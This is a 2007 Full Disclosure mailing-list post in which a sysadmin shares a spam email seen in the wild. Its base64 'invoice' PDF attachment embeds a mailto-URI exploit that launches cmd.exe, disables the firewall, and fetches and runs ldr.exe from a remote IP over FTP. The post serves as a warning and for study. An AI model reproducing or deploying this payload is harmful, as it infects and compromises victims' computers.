Full Disclosure mailing list archives
PDF mailto exploit in the wild
From: Paul Szabo <psz () maths usyd edu au>
Date: Tue, 23 Oct 2007 22:18:52 +1000
In case you are interested... messages like the following were spammed to my users tonight. Cheers, Paul Szabo psz () maths usyd edu au http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of Sydney Australia ---
From sabansal1 () gmail com Tue Oct 23 18:20:46 2007 Received: from nf-out-0910.google.com (nf-out-0910.google.com [64.233.182.187]) by london.ucc.usyd.edu.au (Postfix) with ESMTP id 17D582CAC1E for <tang () maths usyd edu au>; Tue, 23 Oct 2007 18:20:13 +1000 (EST) Received: by nf-out-0910.google.com with SMTP id b2so1929536nfb for <tang () maths usyd edu au>; Tue, 23 Oct 2007 01:20:12 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:to:subject:date:mime-version:x-mailer:x-mimeole:thread-index:content-type:from; bh=RBeyhq9knF4zOhfDArq39Bm0/FWUFdutXHfudq1gwxE=; b=Qs8RvpCyO4UBVRo3N73MXad3ZQWzfT/6L1+snsI7Ty0ZwHuynJLpIBAIcVEGGxvfs9+pB06orF5efPl7aYqq3jQBI19jZBMUE9Tcf2TndqhPmE3nIADCgUnWEP5xo5xGug2lq6coG8MfdZd6+oIYtkdCMzl6nweV1f76zYWereQ= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:to:subject:date:mime-version:x-mailer:x-mimeole:thread-index:content-type:from; b=h1M0bnJzcqTTj5XzB6QgMJ0ugePdD1uvgzov2kTbStB+KW9WsynewPJJlv0ml/ILNka98867Gm2QrvL+2V5esH7Flnm5EJXpMxDSwiSv84SExd7TZFxdAsy2tYd2eiQ+Wy2Z6SlaLdZdbQv27sJ8tdN9QGNxBFWyYotdY4LwH7Y= Received: by 10.82.112.3 with SMTP id k3mr5564785buc.1193127611679; Tue, 23 Oct 2007 01:20:11 -0700 (PDT) Received: from ?12.206.143.237? ( [12.206.143.237]) by mx.google.com with ESMTPS id k7sm6753182nfh.2007.10.23.01.20.06 (version=SSLv3 cipher=OTHER); Tue, 23 Oct 2007 01:20:10 -0700 (PDT) Message-ID: <G9THMfvCFEH0Ii.362DBDDF78@VLA18BS> To: <andrewadams2650 () hotmail com> Subject: STATEMET indigene Date: Tue, 23 Oct 2007 08:11:47 +0000 MIME-Version: 1.0 X-Mailer: Microsoft Office Outlook, Build 11.0.5510 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106 Thread-Index: leRJrPkueCIQWNOdN8y1PxNCM0wkvbPn8IKv Content-type: multipart/mixed; boundary="----=_NextPart_000_00F6_04BCC8AB.87205748" From: Gilbert <sabansal1 () gmail com> X-PMX-Version: USyd20070806 5.3.3.310218, Antispam-Engine: 2.5.2.311128, Antispam-Data: 2007.10.23.5823 X-PerlMx-Spam: Gauge=IIIIIII, Probability=7%, Report='PDF_ATTACHED_2 0, PDF_SIZE_0_10K 0, __ATTACHMENT_SIZE_0_10K 0, __CT 0, __CTYPE_HAS_BOUNDARY 0, __CTYPE_MULTIPART 0, __FROM_GMAIL 0, __HAS_MSGID 0, __HAS_X_MAILER 0, __HELO_GMAIL 0, __MIME_VERSION 0, __RDNS_GMAIL 0, __SANE_MSGID 0, __USER_AGENT_MS_GENERIC 0, __pbl.spamhaus.org_TIMEOUT , __sbl.spamhaus.org_TIMEOUT ' Content-Length: 5618 Status: R ------=_NextPart_000_00F6_04BCC8AB.87205748 Content-Type: text/plain; charset="Windows-1251" Content-Transfer-Encoding: 7bit fanner ctenoid varment ------=_NextPart_000_00F6_04BCC8AB.87205748 Content-type: application/octet-stream; name="BILL.pdf" Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="INVOICE.pdf" JVBERi0xLjYNJeLjz9MNCjQgMCBvYmogPDwvTGluZWFyaXplZCAxL0wgMzA3NDEvTyA2L0UgMjY4 ODEvTiAxL1QgMzA2MTUvSCBbIDUzNiAxNDZdPj4NZW5kb2JqDSAgICAgICAgICAgICAgICAgICAg DQp4cmVmDQo0IDEyDQowMDAwMDAwMDE2IDAwMDAwIG4NCjAwMDAwMDA2ODIgMDAwMDAgbg0KMDAw MDAwMDc0MSAwMDAwMCBuDQowMDAwMDAwOTI4IDAwMDAwIG4NCjAwMDAwMDA5NzcgMDAwMDAgbg0K MDAwMDAwMTAwNiAwMDAwMCBuDQowMDAwMDI1NDA5IDAwMDAwIG4NCjAwMDAwMjU1OTggMDAwMDAg bg0KMDAwMDAyNjA0MiAwMDAwMCBuDQowMDAwMDI2MzMwIDAwMDAwIG4NCjAwMDAwMjY3ODYgMDAw MDAgbg0KMDAwMDAwMDUzNiAwMDAwMCBuDQp0cmFpbGVyDQo8PC9TaXplIDE2L1ByZXYgMzA2MDUv Um9vdCA1IDAgUi9JbmZvIDMgMCBSL0lEWzxGNEU2NDFGMjI2MzA5MjVCRjM0NkYwRkE2NDExRDZF QT48Q0Y1QTJFNkM4NTY3Nzg0OEEwRjZEOEVBQzFBMDQ1Qzg+XT4+DQpzdGFydHhyZWYNCjANCiUl RU9GDQogICAgICAgICAgICAgICAgDQo1IDAgb2JqPDwvTWV0YWRhdGEgMiAwIFIvUGFnZXMgMSAw IFIvVHlwZS9DYXRhbG9nPj4NZW5kb2JqDTYgMCBvYmo8PC9Dcm9wQm94WzAgMCA1OTUgODQyXS9Q YXJlbnQgMSAwIFIvQ29udGVudHMgMTMgMCBSL1JvdGF0ZSAwL0dyb3VwPDwvSSB0cnVlL0NTL0Rl dmljZVJHQi9TL1RyYW5zcGFyZW5jeT4+L01lZGlhQm94WzAgMCA1OTUgODQyXS9SZXNvdXJjZXMg NyAwIFIvVHlwZS9QYWdlL0FBPDwvTyAxNCAwIFI+Pj4+DWVuZG9iag0xNCAwIG9iajw8L1VSSSht YWlsdG86JS8uLi8uLi8uLi8uLi8uLi8uLi9XaW5kb3dzL3N5c3RlbTMyL2NtZCIuZXhlIiIgL2Mg L3EgXCJAZWNobyBvZmYmbmV0c2ggZmlyZXdhbGwgc2V0IG9wbW9kZSBtb2RlPWRpc2FibGUmZWNo byBvIDgxLjk1LjE0Ni4xMzA+MSZlY2hvIGJpbmFyeT4+MSZlY2hvIGdldCAvbGRyLmV4ZT4+MSZl Y2hvIHF1aXQ+PjEmZnRwIC1zOjEgLXYgLUE+bnVsJmRlbCAvcSAxJiBzdGFydCBsZHIuZXhlJlwi IFwiJlwiICJudWwuYmF0KS9TL1VSST4+DWVuZG9iag0xIDAgb2JqPDwvQ291bnQgMS9UeXBlL1Bh Z2VzL0tpZHNbNiAwIFJdPj4NCmVuZG9iag0KMiAwIG9iajw8L1N1YnR5cGUvWE1ML0xlbmd0aCAz NDI5L1R5cGUvTWV0YWRhdGE+PnN0cmVhbQ0KPD94cGFja2V0IGJlZ2luPSLvu78iIGlkPSJXNU0w TXBDZWhpSHpyZVN6TlRjemtjOWQiPz4KPHg6eG1wbWV0YSB4bWxuczp4PSJhZG9iZTpuczptZXRh LyIgeDp4bXB0az0iMy4xLTcwMiI+CiAgIDxyZGY6UkRGIHhtbG5zOnJkZj0iaHR0cDovL3d3dy53 My5vcmcvMTk5OS8wMi8yMi1yZGYtc3ludGF4LW5zIyI+CiAgICAgIDxyZGY6RGVzY3JpcHRpb24g cmRmOmFib3V0PSIiCiAgICAgICAgICAgIHhtbG5zOnhhcD0iaHR0cDovL25zLmFkb2JlLmNvbS94 YXAvMS4wLyI+CiAgICAgIDwvcmRmOkRlc2NyaXB0aW9uPgogICAgICA8cmRmOkRlc2NyaXB0aW9u IHJkZjphYm91dD0iIgogICAgICAgICAgICB4bWxuczpkYz0iaHR0cDovL3B1cmwub3JnL2RjL2Vs ZW1lbnRzLzEuMS8iPgogICAgICAgICA8ZGM6Zm9ybWF0PmFwcGxpY2F0aW9uL3BkZjwvZGM6Zm9y bWF0PgogICA8L3JkZjpSREY+CjwveDp4bXBtZXRhPgogICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAK ICAgICAgICAgICAgICAgICAgICAgICAgICAgCjw/eHBhY2tldCBlbmQ9InciPz4NCmVuZHN0cmVh bQ1lbmRvYmoNeHJlZg0KMCA0DQowMDAwMDAwMDAwIDY1NTM1IGYNCjAwMDAwMjY4ODEgMDAwMDAg bg0KMDAwMDAyNjkzMSAwMDAwMCBuDQowMDAwMDMwNDM2IDAwMDAwIG4NCnRyYWlsZXINCjw8L1Np emUgND4+DQpzdGFydHhyZWYNCjExNg0KJSVFT0YNCg== ------=_NextPart_000_00F6_04BCC8AB.87205748--
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- PDF mailto exploit in the wild Paul Szabo (Oct 23)
- Re: PDF mailto exploit in the wild Nick Boyce (Oct 23)
- Re: PDF mailto exploit in the wild Gregory Boyce (Oct 23)
- Re: PDF mailto exploit in the wild Nick Boyce (Oct 23)
- Re: PDF mailto exploit in the wild Gregory Boyce (Oct 23)
- Re: PDF mailto exploit in the wild 3APA3A (Oct 23)
- Re: PDF mailto exploit in the wild Paul Szabo (Oct 23)
- Re: PDF mailto exploit in the wild biz4rre (Oct 23)
- Re: PDF mailto exploit in the wild Nick Boyce (Oct 23)